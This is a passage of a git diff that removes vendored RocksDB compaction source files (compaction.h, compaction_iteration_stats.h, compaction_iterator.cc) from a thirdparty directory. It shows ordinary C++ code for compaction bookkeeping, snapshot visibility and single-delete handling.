-  size_t num_input_files(size_t compaction_input_level) const {
-    if (compaction_input_level < inputs_.size()) {
-      return inputs_[compaction_input_level].size();
-    }
-    return 0;
-  }
-
-  // Returns input version of the compaction
-  Version* input_version() const { return input_version_; }
-
-  // Returns the ColumnFamilyData associated with the compaction.
-  ColumnFamilyData* column_family_data() const { return cfd_; }
-
-  // Returns the file meta data of the 'i'th input file at the
-  // specified compaction input level.
-  // REQUIREMENT: "compaction_input_level" must be >= 0 and
-  //              < "input_levels()"
-  FileMetaData* input(size_t compaction_input_level, size_t i) const {
-    assert(compaction_input_level < inputs_.size());
-    return inputs_[compaction_input_level][i];
-  }
-
-  // Returns the list of file meta data of the specified compaction
-  // input level.
-  // REQUIREMENT: "compaction_input_level" must be >= 0 and
-  //              < "input_levels()"
-  const std::vector<FileMetaData*>* inputs(
-      size_t compaction_input_level) const {
-    assert(compaction_input_level < inputs_.size());
-    return &inputs_[compaction_input_level].files;
-  }
-
-  const std::vector<CompactionInputFiles>* inputs() { return &inputs_; }
-
-  // Returns the LevelFilesBrief of the specified compaction input level.
-  const LevelFilesBrief* input_levels(size_t compaction_input_level) const {
-    return &input_levels_[compaction_input_level];
-  }
-
-  // Maximum size of files to build during this compaction.
-  uint64_t max_output_file_size() const { return max_output_file_size_; }
-
-  // What compression for output
-  CompressionType output_compression() const { return output_compression_; }
-
-  // Whether need to write output file to second DB path.
-  uint32_t output_path_id() const { return output_path_id_; }
-
-  // Is this a trivial compaction that can be implemented by just
-  // moving a single input file to the next level (no merging or splitting)
-  bool IsTrivialMove() const;
-
-  // If true, then the compaction can be done by simply deleting input files.
-  bool deletion_compaction() const { return deletion_compaction_; }
-
-  // Add all inputs to this compaction as delete operations to *edit.
-  void AddInputDeletions(VersionEdit* edit);
-
-  // Returns true if the available information we have guarantees that
-  // the input "user_key" does not exist in any level beyond "output_level()".
-  bool KeyNotExistsBeyondOutputLevel(const Slice& user_key,
-                                     std::vector<size_t>* level_ptrs) const;
-
-  // Clear all files to indicate that they are not being compacted
-  // Delete this compaction from the list of running compactions.
-  //
-  // Requirement: DB mutex held
-  void ReleaseCompactionFiles(Status status);
-
-  // Returns the summary of the compaction in "output" with maximum "len"
-  // in bytes.  The caller is responsible for the memory management of
-  // "output".
-  void Summary(char* output, int len);
-
-  // Return the score that was used to pick this compaction run.
-  double score() const { return score_; }
-
-  // Is this compaction creating a file in the bottom most level?
-  bool bottommost_level() const { return bottommost_level_; }
-
-  // Does this compaction include all sst files?
-  bool is_full_compaction() const { return is_full_compaction_; }
-
-  // Was this compaction triggered manually by the client?
-  bool is_manual_compaction() const { return is_manual_compaction_; }
-
-  // Used when allow_trivial_move option is set in
-  // Universal compaction. If all the input files are
-  // non overlapping, then is_trivial_move_ variable
-  // will be set true, else false
-  void set_is_trivial_move(bool trivial_move) {
-    is_trivial_move_ = trivial_move;
-  }
-
-  // Used when allow_trivial_move option is set in
-  // Universal compaction. Returns true, if the input files
-  // are non-overlapping and can be trivially moved.
-  bool is_trivial_move() const { return is_trivial_move_; }
-
-  // How many total levels are there?
-  int number_levels() const { return number_levels_; }
-
-  // Return the ImmutableCFOptions that should be used throughout the compaction
-  // procedure
-  const ImmutableCFOptions* immutable_cf_options() const {
-    return &immutable_cf_options_;
-  }
-
-  // Return the MutableCFOptions that should be used throughout the compaction
-  // procedure
-  const MutableCFOptions* mutable_cf_options() const {
-    return &mutable_cf_options_;
-  }
-
-  // Returns the size in bytes that the output file should be preallocated to.
-  // In level compaction, that is max_file_size_. In universal compaction, that
-  // is the sum of all input file sizes.
-  uint64_t OutputFilePreallocationSize() const;
-
-  void SetInputVersion(Version* input_version);
-
-  struct InputLevelSummaryBuffer {
-    char buffer[128];
-  };
-
-  const char* InputLevelSummary(InputLevelSummaryBuffer* scratch) const;
-
-  uint64_t CalculateTotalInputSize() const;
-
-  // In case of compaction error, reset the nextIndex that is used
-  // to pick up the next file to be compacted from files_by_size_
-  void ResetNextCompactionIndex();
-
-  // Create a CompactionFilter from compaction_filter_factory
-  std::unique_ptr<CompactionFilter> CreateCompactionFilter() const;
-
-  // Is the input level corresponding to output_level_ empty?
-  bool IsOutputLevelEmpty() const;
-
-  // Should this compaction be broken up into smaller ones run in parallel?
-  bool ShouldFormSubcompactions() const;
-
-  // test function to validate the functionality of IsBottommostLevel()
-  // function -- determines if compaction with inputs and storage is bottommost
-  static bool TEST_IsBottommostLevel(
-      int output_level, VersionStorageInfo* vstorage,
-      const std::vector<CompactionInputFiles>& inputs);
-
-  TablePropertiesCollection GetOutputTableProperties() const {
-    return output_table_properties_;
-  }
-
-  void SetOutputTableProperties(TablePropertiesCollection tp) {
-    output_table_properties_ = std::move(tp);
-  }
-
-  Slice GetSmallestUserKey() const { return smallest_user_key_; }
-
-  Slice GetLargestUserKey() const { return largest_user_key_; }
-
-  CompactionReason compaction_reason() { return compaction_reason_; }
-
-  const std::vector<FileMetaData*>& grandparents() const {
-    return grandparents_;
-  }
-
-  uint64_t max_compaction_bytes() const { return max_compaction_bytes_; }
-
-  uint64_t MaxInputFileCreationTime() const;
-
- private:
-  // mark (or clear) all files that are being compacted
-  void MarkFilesBeingCompacted(bool mark_as_compacted);
-
-  // get the smallest and largest key present in files to be compacted
-  static void GetBoundaryKeys(VersionStorageInfo* vstorage,
-                              const std::vector<CompactionInputFiles>& inputs,
-                              Slice* smallest_key, Slice* largest_key);
-
-  // helper function to determine if compaction with inputs and storage is
-  // bottommost
-  static bool IsBottommostLevel(
-      int output_level, VersionStorageInfo* vstorage,
-      const std::vector<CompactionInputFiles>& inputs);
-
-  static bool IsFullCompaction(VersionStorageInfo* vstorage,
-                               const std::vector<CompactionInputFiles>& inputs);
-
-  VersionStorageInfo* input_vstorage_;
-
-  const int start_level_;    // the lowest level to be compacted
-  const int output_level_;  // levels to which output files are stored
-  uint64_t max_output_file_size_;
-  uint64_t max_compaction_bytes_;
-  const ImmutableCFOptions immutable_cf_options_;
-  const MutableCFOptions mutable_cf_options_;
-  Version* input_version_;
-  VersionEdit edit_;
-  const int number_levels_;
-  ColumnFamilyData* cfd_;
-  Arena arena_;          // Arena used to allocate space for file_levels_
-
-  const uint32_t output_path_id_;
-  CompressionType output_compression_;
-  // If true, then the comaction can be done by simply deleting input files.
-  const bool deletion_compaction_;
-
-  // Compaction input files organized by level. Constant after construction
-  const std::vector<CompactionInputFiles> inputs_;
-
-  // A copy of inputs_, organized more closely in memory
-  autovector<LevelFilesBrief, 2> input_levels_;
-
-  // State used to check for number of overlapping grandparent files
-  // (grandparent == "output_level_ + 1")
-  std::vector<FileMetaData*> grandparents_;
-  const double score_;         // score that was used to pick this compaction.
-
-  // Is this compaction creating a file in the bottom most level?
-  const bool bottommost_level_;
-  // Does this compaction include all sst files?
-  const bool is_full_compaction_;
-
-  // Is this compaction requested by the client?
-  const bool is_manual_compaction_;
-
-  // True if we can do trivial move in Universal multi level
-  // compaction
-  bool is_trivial_move_;
-
-  // Does input compression match the output compression?
-  bool InputCompressionMatchesOutput() const;
-
-  // table properties of output files
-  TablePropertiesCollection output_table_properties_;
-
-  // smallest user keys in compaction
-  Slice smallest_user_key_;
-
-  // largest user keys in compaction
-  Slice largest_user_key_;
-
-  // Reason for compaction
-  CompactionReason compaction_reason_;
-};
-
-// Utility function
-extern uint64_t TotalFileSize(const std::vector<FileMetaData*>& files);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_iteration_stats.h b/thirdparty/rocksdb/db/compaction_iteration_stats.h
deleted file mode 100644
index ddb5346..0000000
--- a/thirdparty/rocksdb/db/compaction_iteration_stats.h
+++ /dev/null
@@ -1,35 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-struct CompactionIterationStats {
-  // Compaction statistics
-
-  // Doesn't include records skipped because of
-  // CompactionFilter::Decision::kRemoveAndSkipUntil.
-  int64_t num_record_drop_user = 0;
-
-  int64_t num_record_drop_hidden = 0;
-  int64_t num_record_drop_obsolete = 0;
-  int64_t num_record_drop_range_del = 0;
-  int64_t num_range_del_drop_obsolete = 0;
-  // Deletions obsoleted before bottom level due to file gap optimization.
-  int64_t num_optimized_del_drop_obsolete = 0;
-  uint64_t total_filter_time = 0;
-
-  // Input statistics
-  // TODO(noetzli): The stats are incomplete. They are lacking everything
-  // consumed by MergeHelper.
-  uint64_t num_input_records = 0;
-  uint64_t num_input_deletion_records = 0;
-  uint64_t num_input_corrupt_records = 0;
-  uint64_t total_input_raw_key_bytes = 0;
-  uint64_t total_input_raw_value_bytes = 0;
-
-  // Single-Delete diagnostics for exceptional situations
-  uint64_t num_single_del_fallthru = 0;
-  uint64_t num_single_del_mismatch = 0;
-};
diff --git a/thirdparty/rocksdb/db/compaction_iterator.cc b/thirdparty/rocksdb/db/compaction_iterator.cc
deleted file mode 100644
index ae63f04..0000000
--- a/thirdparty/rocksdb/db/compaction_iterator.cc
+++ /dev/null
@@ -1,588 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/compaction_iterator.h"
-#include "rocksdb/listener.h"
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-CompactionEventListener::CompactionListenerValueType fromInternalValueType(
-    ValueType vt) {
-  switch (vt) {
-    case kTypeDeletion:
-      return CompactionEventListener::CompactionListenerValueType::kDelete;
-    case kTypeValue:
-      return CompactionEventListener::CompactionListenerValueType::kValue;
-    case kTypeMerge:
-      return CompactionEventListener::CompactionListenerValueType::
-          kMergeOperand;
-    case kTypeSingleDeletion:
-      return CompactionEventListener::CompactionListenerValueType::
-          kSingleDelete;
-    case kTypeRangeDeletion:
-      return CompactionEventListener::CompactionListenerValueType::kRangeDelete;
-    case kTypeBlobIndex:
-      return CompactionEventListener::CompactionListenerValueType::kBlobIndex;
-    default:
-      assert(false);
-      return CompactionEventListener::CompactionListenerValueType::kInvalid;
-  }
-}
-#endif  // ROCKSDB_LITE
-
-CompactionIterator::CompactionIterator(
-    InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper,
-    SequenceNumber last_sequence, std::vector<SequenceNumber>* snapshots,
-    SequenceNumber earliest_write_conflict_snapshot, Env* env,
-    bool expect_valid_internal_key, RangeDelAggregator* range_del_agg,
-    const Compaction* compaction, const CompactionFilter* compaction_filter,
-    CompactionEventListener* compaction_listener,
-    const std::atomic<bool>* shutting_down)
-    : CompactionIterator(
-          input, cmp, merge_helper, last_sequence, snapshots,
-          earliest_write_conflict_snapshot, env, expect_valid_internal_key,
-          range_del_agg,
-          std::unique_ptr<CompactionProxy>(
-              compaction ? new CompactionProxy(compaction) : nullptr),
-          compaction_filter, compaction_listener, shutting_down) {}
-
-CompactionIterator::CompactionIterator(
-    InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper,
-    SequenceNumber last_sequence, std::vector<SequenceNumber>* snapshots,
-    SequenceNumber earliest_write_conflict_snapshot, Env* env,
-    bool expect_valid_internal_key, RangeDelAggregator* range_del_agg,
-    std::unique_ptr<CompactionProxy> compaction,
-    const CompactionFilter* compaction_filter,
-    CompactionEventListener* compaction_listener,
-    const std::atomic<bool>* shutting_down)
-    : input_(input),
-      cmp_(cmp),
-      merge_helper_(merge_helper),
-      snapshots_(snapshots),
-      earliest_write_conflict_snapshot_(earliest_write_conflict_snapshot),
-      env_(env),
-      expect_valid_internal_key_(expect_valid_internal_key),
-      range_del_agg_(range_del_agg),
-      compaction_(std::move(compaction)),
-      compaction_filter_(compaction_filter),
-#ifndef ROCKSDB_LITE
-      compaction_listener_(compaction_listener),
-#endif  // ROCKSDB_LITE
-      shutting_down_(shutting_down),
-      ignore_snapshots_(false),
-      merge_out_iter_(merge_helper_) {
-  assert(compaction_filter_ == nullptr || compaction_ != nullptr);
-  bottommost_level_ =
-      compaction_ == nullptr ? false : compaction_->bottommost_level();
-  if (compaction_ != nullptr) {
-    level_ptrs_ = std::vector<size_t>(compaction_->number_levels(), 0);
-  }
-
-  if (snapshots_->size() == 0) {
-    // optimize for fast path if there are no snapshots
-    visible_at_tip_ = true;
-    earliest_snapshot_ = kMaxSequenceNumber;
-    latest_snapshot_ = 0;
-  } else {
-    visible_at_tip_ = false;
-    earliest_snapshot_ = snapshots_->at(0);
-    latest_snapshot_ = snapshots_->back();
-  }
-  if (compaction_filter_ != nullptr) {
-    if (compaction_filter_->IgnoreSnapshots()) {
-      ignore_snapshots_ = true;
-    }
-  } else {
-    ignore_snapshots_ = false;
-  }
-  input_->SetPinnedItersMgr(&pinned_iters_mgr_);
-}
-
-CompactionIterator::~CompactionIterator() {
-  // input_ Iteartor lifetime is longer than pinned_iters_mgr_ lifetime
-  input_->SetPinnedItersMgr(nullptr);
-}
-
-void CompactionIterator::ResetRecordCounts() {
-  iter_stats_.num_record_drop_user = 0;
-  iter_stats_.num_record_drop_hidden = 0;
-  iter_stats_.num_record_drop_obsolete = 0;
-  iter_stats_.num_record_drop_range_del = 0;
-  iter_stats_.num_range_del_drop_obsolete = 0;
-  iter_stats_.num_optimized_del_drop_obsolete = 0;
-}
-
-void CompactionIterator::SeekToFirst() {
-  NextFromInput();
-  PrepareOutput();
-}
-
-void CompactionIterator::Next() {
-  // If there is a merge output, return it before continuing to process the
-  // input.
-  if (merge_out_iter_.Valid()) {
-    merge_out_iter_.Next();
-
-    // Check if we returned all records of the merge output.
-    if (merge_out_iter_.Valid()) {
-      key_ = merge_out_iter_.key();
-      value_ = merge_out_iter_.value();
-      bool valid_key __attribute__((__unused__)) =
-          ParseInternalKey(key_, &ikey_);
-      // MergeUntil stops when it encounters a corrupt key and does not
-      // include them in the result, so we expect the keys here to be valid.
-      assert(valid_key);
-      // Keep current_key_ in sync.
-      current_key_.UpdateInternalKey(ikey_.sequence, ikey_.type);
-      key_ = current_key_.GetInternalKey();
-      ikey_.user_key = current_key_.GetUserKey();
-      valid_ = true;
-    } else {
-      // We consumed all pinned merge operands, release pinned iterators
-      pinned_iters_mgr_.ReleasePinnedData();
-      // MergeHelper moves the iterator to the first record after the merged
-      // records, so even though we reached the end of the merge output, we do
-      // not want to advance the iterator.
-      NextFromInput();
-    }
-  } else {
-    // Only advance the input iterator if there is no merge output and the
-    // iterator is not already at the next record.
-    if (!at_next_) {
-      input_->Next();
-    }
-    NextFromInput();
-  }
-
-  if (valid_) {
-    // Record that we've outputted a record for the current key.
-    has_outputted_key_ = true;
-  }
-
-  PrepareOutput();
-}
-
-void CompactionIterator::NextFromInput() {
-  at_next_ = false;
-  valid_ = false;
-
-  while (!valid_ && input_->Valid() && !IsShuttingDown()) {
-    key_ = input_->key();
-    value_ = input_->value();
-    iter_stats_.num_input_records++;
-
-    if (!ParseInternalKey(key_, &ikey_)) {
-      // If `expect_valid_internal_key_` is false, return the corrupted key
-      // and let the caller decide what to do with it.
-      // TODO(noetzli): We should have a more elegant solution for this.
-      if (expect_valid_internal_key_) {
-        assert(!"Corrupted internal key not expected.");
-        status_ = Status::Corruption("Corrupted internal key not expected.");
-        break;
-      }
-      key_ = current_key_.SetInternalKey(key_);
-      has_current_user_key_ = false;
-      current_user_key_sequence_ = kMaxSequenceNumber;
-      current_user_key_snapshot_ = 0;
-      iter_stats_.num_input_corrupt_records++;
-      valid_ = true;
-      break;
-    }
-
-    // Update input statistics
-    if (ikey_.type == kTypeDeletion || ikey_.type == kTypeSingleDeletion) {
-      iter_stats_.num_input_deletion_records++;
-    }
-    iter_stats_.total_input_raw_key_bytes += key_.size();
-    iter_stats_.total_input_raw_value_bytes += value_.size();
-
-    // If need_skip is true, we should seek the input iterator
-    // to internal key skip_until and continue from there.
-    bool need_skip = false;
-    // Points either into compaction_filter_skip_until_ or into
-    // merge_helper_->compaction_filter_skip_until_.
-    Slice skip_until;
-
-    // Check whether the user key changed. After this if statement current_key_
-    // is a copy of the current input key (maybe converted to a delete by the
-    // compaction filter). ikey_.user_key is pointing to the copy.
-    if (!has_current_user_key_ ||
-        !cmp_->Equal(ikey_.user_key, current_user_key_)) {
-      // First occurrence of this user key
-      // Copy key for output
-      key_ = current_key_.SetInternalKey(key_, &ikey_);
-      current_user_key_ = ikey_.user_key;
-      has_current_user_key_ = true;
-      has_outputted_key_ = false;
-      current_user_key_sequence_ = kMaxSequenceNumber;
-      current_user_key_snapshot_ = 0;
-
-#ifndef ROCKSDB_LITE
-      if (compaction_listener_) {
-        compaction_listener_->OnCompaction(compaction_->level(), ikey_.user_key,
-                                           fromInternalValueType(ikey_.type),
-                                           value_, ikey_.sequence, true);
-      }
-#endif  // ROCKSDB_LITE
-
-      // apply the compaction filter to the first occurrence of the user key
-      if (compaction_filter_ != nullptr && 
-          (ikey_.type == kTypeValue || ikey_.type == kTypeBlobIndex) &&
-          (visible_at_tip_ || ikey_.sequence > latest_snapshot_ ||
-           ignore_snapshots_)) {
-        // If the user has specified a compaction filter and the sequence
-        // number is greater than any external snapshot, then invoke the
-        // filter. If the return value of the compaction filter is true,
-        // replace the entry with a deletion marker.
-        CompactionFilter::Decision filter;
-        compaction_filter_value_.clear();
-        compaction_filter_skip_until_.Clear();
-        CompactionFilter::ValueType value_type =
-            ikey_.type == kTypeValue ? CompactionFilter::ValueType::kValue
-                                     : CompactionFilter::ValueType::kBlobIndex;
-        {
-          StopWatchNano timer(env_, true);
-          filter = compaction_filter_->FilterV2(
-              compaction_->level(), ikey_.user_key, value_type, value_,
-              &compaction_filter_value_, compaction_filter_skip_until_.rep());
-          iter_stats_.total_filter_time +=
-              env_ != nullptr ? timer.ElapsedNanos() : 0;
-        }
-
-        if (filter == CompactionFilter::Decision::kRemoveAndSkipUntil &&
-            cmp_->Compare(*compaction_filter_skip_until_.rep(),
-                          ikey_.user_key) <= 0) {
-          // Can't skip to a key smaller than the current one.
-          // Keep the key as per FilterV2 documentation.
-          filter = CompactionFilter::Decision::kKeep;
-        }
-
-        if (filter == CompactionFilter::Decision::kRemove) {
-          // convert the current key to a delete; key_ is pointing into
-          // current_key_ at this point, so updating current_key_ updates key()
-          ikey_.type = kTypeDeletion;
-          current_key_.UpdateInternalKey(ikey_.sequence, kTypeDeletion);
-          // no value associated with delete
-          value_.clear();
-          iter_stats_.num_record_drop_user++;
-        } else if (filter == CompactionFilter::Decision::kChangeValue) {
-          value_ = compaction_filter_value_;
-        } else if (filter == CompactionFilter::Decision::kRemoveAndSkipUntil) {
-          need_skip = true;
-          compaction_filter_skip_until_.ConvertFromUserKey(kMaxSequenceNumber,
-                                                           kValueTypeForSeek);
-          skip_until = compaction_filter_skip_until_.Encode();
-        }
-      }
-    } else {
-#ifndef ROCKSDB_LITE
-      if (compaction_listener_) {
-        compaction_listener_->OnCompaction(compaction_->level(), ikey_.user_key,
-                                           fromInternalValueType(ikey_.type),
-                                           value_, ikey_.sequence, false);
-      }
-#endif  // ROCKSDB_LITE
-
-      // Update the current key to reflect the new sequence number/type without
-      // copying the user key.
-      // TODO(rven): Compaction filter does not process keys in this path
-      // Need to have the compaction filter process multiple versions
-      // if we have versions on both sides of a snapshot
-      current_key_.UpdateInternalKey(ikey_.sequence, ikey_.type);
-      key_ = current_key_.GetInternalKey();
-      ikey_.user_key = current_key_.GetUserKey();
-    }
-
-    // If there are no snapshots, then this kv affect visibility at tip.
-    // Otherwise, search though all existing snapshots to find the earliest
-    // snapshot that is affected by this kv.
-    SequenceNumber last_sequence __attribute__((__unused__)) =
-        current_user_key_sequence_;
-    current_user_key_sequence_ = ikey_.sequence;
-    SequenceNumber last_snapshot = current_user_key_snapshot_;
-    SequenceNumber prev_snapshot = 0;  // 0 means no previous snapshot
-    current_user_key_snapshot_ =
-        visible_at_tip_
-            ? earliest_snapshot_
-            : findEarliestVisibleSnapshot(ikey_.sequence, &prev_snapshot);
-
-    if (need_skip) {
-      // This case is handled below.
-    } else if (clear_and_output_next_key_) {
-      // In the previous iteration we encountered a single delete that we could
-      // not compact out.  We will keep this Put, but can drop it's data.
-      // (See Optimization 3, below.)
-      assert(ikey_.type == kTypeValue);
-      assert(current_user_key_snapshot_ == last_snapshot);
-
-      value_.clear();
-      valid_ = true;
-      clear_and_output_next_key_ = false;
-    } else if (ikey_.type == kTypeSingleDeletion) {
-      // We can compact out a SingleDelete if:
-      // 1) We encounter the corresponding PUT -OR- we know that this key
-      //    doesn't appear past this output level
-      // =AND=
-      // 2) We've already returned a record in this snapshot -OR-
-      //    there are no earlier earliest_write_conflict_snapshot.
-      //
-      // Rule 1 is needed for SingleDelete correctness.  Rule 2 is needed to
-      // allow Transactions to do write-conflict checking (if we compacted away
-      // all keys, then we wouldn't know that a write happened in this
-      // snapshot).  If there is no earlier snapshot, then we know that there
-      // are no active transactions that need to know about any writes.
-      //
-      // Optimization 3:
-      // If we encounter a SingleDelete followed by a PUT and Rule 2 is NOT
-      // true, then we must output a SingleDelete.  In this case, we will decide
-      // to also output the PUT.  While we are compacting less by outputting the
-      // PUT now, hopefully this will lead to better compaction in the future
-      // when Rule 2 is later true (Ie, We are hoping we can later compact out
-      // both the SingleDelete and the Put, while we couldn't if we only
-      // outputted the SingleDelete now).
-      // In this case, we can save space by removing the PUT's value as it will
-      // never be read.
-      //
-      // Deletes and Merges are not supported on the same key that has a
-      // SingleDelete as it is not possible to correctly do any partial
-      // compaction of such a combination of operations.  The result of mixing
-      // those operations for a given key is documented as being undefined.  So
-      // we can choose how to handle such a combinations of operations.  We will
-      // try to compact out as much as we can in these cases.
-      // We will report counts on these anomalous cases.
-
-      // The easiest way to process a SingleDelete during iteration is to peek
-      // ahead at the next key.
-      ParsedInternalKey next_ikey;
-      input_->Next();
-
-      // Check whether the next key exists, is not corrupt, and is the same key
-      // as the single delete.
-      if (input_->Valid() && ParseInternalKey(input_->key(), &next_ikey) &&
-          cmp_->Equal(ikey_.user_key, next_ikey.user_key)) {
-        // Check whether the next key belongs to the same snapshot as the
-        // SingleDelete.
-        if (prev_snapshot == 0 || next_ikey.sequence > prev_snapshot) {
-          if (next_ikey.type == kTypeSingleDeletion) {
-            // We encountered two SingleDeletes in a row.  This could be due to
-            // unexpected user input.
-            // Skip the first SingleDelete and let the next iteration decide how
-            // to handle the second SingleDelete
-
-            // First SingleDelete has been skipped since we already called
-            // input_->Next().
-            ++iter_stats_.num_record_drop_obsolete;
-            ++iter_stats_.num_single_del_mismatch;
-          } else if ((ikey_.sequence <= earliest_write_conflict_snapshot_) ||
-                     has_outputted_key_) {
-            // Found a matching value, we can drop the single delete and the
-            // value.  It is safe to drop both records since we've already
-            // outputted a key in this snapshot, or there is no earlier
-            // snapshot (Rule 2 above).
-
-            // Note: it doesn't matter whether the second key is a Put or if it
-            // is an unexpected Merge or Delete.  We will compact it out
-            // either way. We will maintain counts of how many mismatches
-            // happened
-            if (next_ikey.type != kTypeValue) {
-              ++iter_stats_.num_single_del_mismatch;
-            }
-
-            ++iter_stats_.num_record_drop_hidden;
-            ++iter_stats_.num_record_drop_obsolete;
-            // Already called input_->Next() once.  Call it a second time to
-            // skip past the second key.
-            input_->Next();
-          } else {
-            // Found a matching value, but we cannot drop both keys since
-            // there is an earlier snapshot and we need to leave behind a record
-            // to know that a write happened in this snapshot (Rule 2 above).
-            // Clear the value and output the SingleDelete. (The value will be
-            // outputted on the next iteration.)
-
-            // Setting valid_ to true will output the current SingleDelete
-            valid_ = true;
-
-            // Set up the Put to be outputted in the next iteration.
-            // (Optimization 3).
-            clear_and_output_next_key_ = true;
-          }
-        } else {
-          // We hit the next snapshot without hitting a put, so the iterator
-          // returns the single delete.
-          valid_ = true;
-        }
-      } else {
-        // We are at the end of the input, could not parse the next key, or hit
-        // a different key. The iterator returns the single delete if the key
-        // possibly exists beyond the current output level.  We set
-        // has_current_user_key to false so that if the iterator is at the next
-        // key, we do not compare it again against the previous key at the next
-        // iteration. If the next key is corrupt, we return before the
-        // comparison, so the value of has_current_user_key does not matter.
-        has_current_user_key_ = false;
-        if (compaction_ != nullptr && ikey_.sequence <= earliest_snapshot_ &&
-            compaction_->KeyNotExistsBeyondOutputLevel(ikey_.user_key,
-                                                       &level_ptrs_)) {
-          // Key doesn't exist outside of this range.
-          // Can compact out this SingleDelete.
-          ++iter_stats_.num_record_drop_obsolete;
-          ++iter_stats_.num_single_del_fallthru;
-          if (!bottommost_level_) {
-            ++iter_stats_.num_optimized_del_drop_obsolete;
-          }
-        } else {
-          // Output SingleDelete
-          valid_ = true;
-        }
-      }
-
-      if (valid_) {
-        at_next_ = true;
-      }
-    } else if (last_snapshot == current_user_key_snapshot_) {
-      // If the earliest snapshot is which this key is visible in
-      // is the same as the visibility of a previous instance of the
-      // same key, then this kv is not visible in any snapshot.
-      // Hidden by an newer entry for same user key
-      // TODO(noetzli): why not > ?
-      //
-      // Note: Dropping this key will not affect TransactionDB write-conflict
-      // checking since there has already been a record returned for this key
-      // in this snapshot.
-      assert(last_sequence >= current_user_key_sequence_);
-      ++iter_stats_.num_record_drop_hidden;  // (A)
-      input_->Next();
-    } else if (compaction_ != nullptr && ikey_.type == kTypeDeletion &&
-               ikey_.sequence <= earliest_snapshot_ &&
-               compaction_->KeyNotExistsBeyondOutputLevel(ikey_.user_key,
-                                                          &level_ptrs_)) {
-      // TODO(noetzli): This is the only place where we use compaction_
-      // (besides the constructor). We should probably get rid of this
-      // dependency and find a way to do similar filtering during flushes.
-      //
-      // For this user key:
-      // (1) there is no data in higher levels
-      // (2) data in lower levels will have larger sequence numbers
-      // (3) data in layers that are being compacted here and have
-      //     smaller sequence numbers will be dropped in the next
-      //     few iterations of this loop (by rule (A) above).
-      // Therefore this deletion marker is obsolete and can be dropped.
-      //
-      // Note:  Dropping this Delete will not affect TransactionDB
-      // write-conflict checking since it is earlier than any snapshot.
-      ++iter_stats_.num_record_drop_obsolete;
-      if (!bottommost_level_) {
-        ++iter_stats_.num_optimized_del_drop_obsolete;
-      }
-      input_->Next();
-    } else if (ikey_.type == kTypeMerge) {
-      if (!merge_helper_->HasOperator()) {
-        status_ = Status::InvalidArgument(
-            "merge_operator is not properly initialized.");
-        return;
-      }
-
-      pinned_iters_mgr_.StartPinning();
-      // We know the merge type entry is not hidden, otherwise we would
-      // have hit (A)
-      // We encapsulate the merge related state machine in a different
-      // object to minimize change to the existing flow.
-      Status s = merge_helper_->MergeUntil(input_, range_del_agg_,
-                                           prev_snapshot, bottommost_level_);
-      merge_out_iter_.SeekToFirst();
-
-      if (!s.ok() && !s.IsMergeInProgress()) {
-        status_ = s;
-        return;
-      } else if (merge_out_iter_.Valid()) {
-        // NOTE: key, value, and ikey_ refer to old entries.
-        //       These will be correctly set below.
-        key_ = merge_out_iter_.key();
-        value_ = merge_out_iter_.value();
-        bool valid_key __attribute__((__unused__)) =
-            ParseInternalKey(key_, &ikey_);
-        // MergeUntil stops when it encounters a corrupt key and does not
-        // include them in the result, so we expect the keys here to valid.
-        assert(valid_key);
-        // Keep current_key_ in sync.
-        current_key_.UpdateInternalKey(ikey_.sequence, ikey_.type);
-        key_ = current_key_.GetInternalKey();
-        ikey_.user_key = current_key_.GetUserKey();
-        valid_ = true;
-      } else {
-        // all merge operands were filtered out. reset the user key, since the
-        // batch consumed by the merge operator should not shadow any keys
-        // coming after the merges
-        has_current_user_key_ = false;
-        pinned_iters_mgr_.ReleasePinnedData();
-
-        if (merge_helper_->FilteredUntil(&skip_until)) {
-          need_skip = true;
-        }
-      }
-    } else {
-      // 1. new user key -OR-
-      // 2. different snapshot stripe
-      bool should_delete = range_del_agg_->ShouldDelete(
-          key_, RangeDelAggregator::RangePositioningMode::kForwardTraversal);
-      if (should_delete) {
-        ++iter_stats_.num_record_drop_hidden;
-        ++iter_stats_.num_record_drop_range_del;
-        input_->Next();
-      } else {
-        valid_ = true;
-      }
-    }
-
-    if (need_skip) {
-      input_->Seek(skip_until);
-    }
-  }
-
-  if (!valid_ && IsShuttingDown()) {
-    status_ = Status::ShutdownInProgress();
-  }
-}
-
-void CompactionIterator::PrepareOutput() {
-  // Zeroing out the sequence number leads to better compression.
-  // If this is the bottommost level (no files in lower levels)
-  // and the earliest snapshot is larger than this seqno
-  // and the userkey differs from the last userkey in compaction
-  // then we can squash the seqno to zero.
-
-  // This is safe for TransactionDB write-conflict checking since transactions
-  // only care about sequence number larger than any active snapshots.
-  if ((compaction_ != nullptr && !compaction_->allow_ingest_behind()) &&
-      bottommost_level_ && valid_ && ikey_.sequence <= earliest_snapshot_ &&
-      ikey_.type != kTypeMerge &&
-      !cmp_->Equal(compaction_->GetLargestUserKey(), ikey_.user_key)) {
-    assert(ikey_.type != kTypeDeletion && ikey_.type != kTypeSingleDeletion);
-    ikey_.sequence = 0;
-    current_key_.UpdateInternalKey(0, ikey_.type);
-  }
-}
-
-inline SequenceNumber CompactionIterator::findEarliestVisibleSnapshot(
-    SequenceNumber in, SequenceNumber* prev_snapshot) {
-  assert(snapshots_->size());
-  SequenceNumber prev __attribute__((__unused__)) = kMaxSequenceNumber;
-  for (const auto cur : *snapshots_) {
-    assert(prev == kMaxSequenceNumber || prev <= cur);
-    if (cur >= in) {
-      *prev_snapshot = prev == kMaxSequenceNumber ? 0 : prev;
-      return cur;
-    }
-    prev = cur;
-    assert(prev < kMaxSequenceNumber);
-  }
-  *prev_snapshot = prev;
-  return kMaxSequenceNumber;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_iterator.h b/thirdparty/rocksdb/db/compaction_iterator.h
deleted file mode 100644
index cad2386..0000000
--- a/thirdparty/rocksdb/db/compaction_iterator.h
